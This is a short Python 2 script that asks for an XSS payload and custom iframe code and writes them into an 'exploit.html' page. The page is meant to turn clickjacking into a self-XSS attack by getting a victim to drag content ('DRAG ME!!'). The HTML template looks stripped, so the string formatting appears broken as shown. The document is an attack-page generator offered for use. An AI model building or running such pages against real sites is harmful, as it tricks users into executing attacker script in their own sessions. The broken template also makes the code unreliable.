print "Clickjack to Xss" vector=raw_input('xss vector--> ') #xss payload html=raw_input('Custom Iframe Code--> ') #custom iframe code fo=open('exploit.html','w') #creating html file source_code="""

Clickjack to exploit self xss

DRAG ME!!

"""%(vector) fo.write(source_code) fo=open('exploit.html','a') fo.write(html) fo.write('') fo.close() #closing the file print "file created"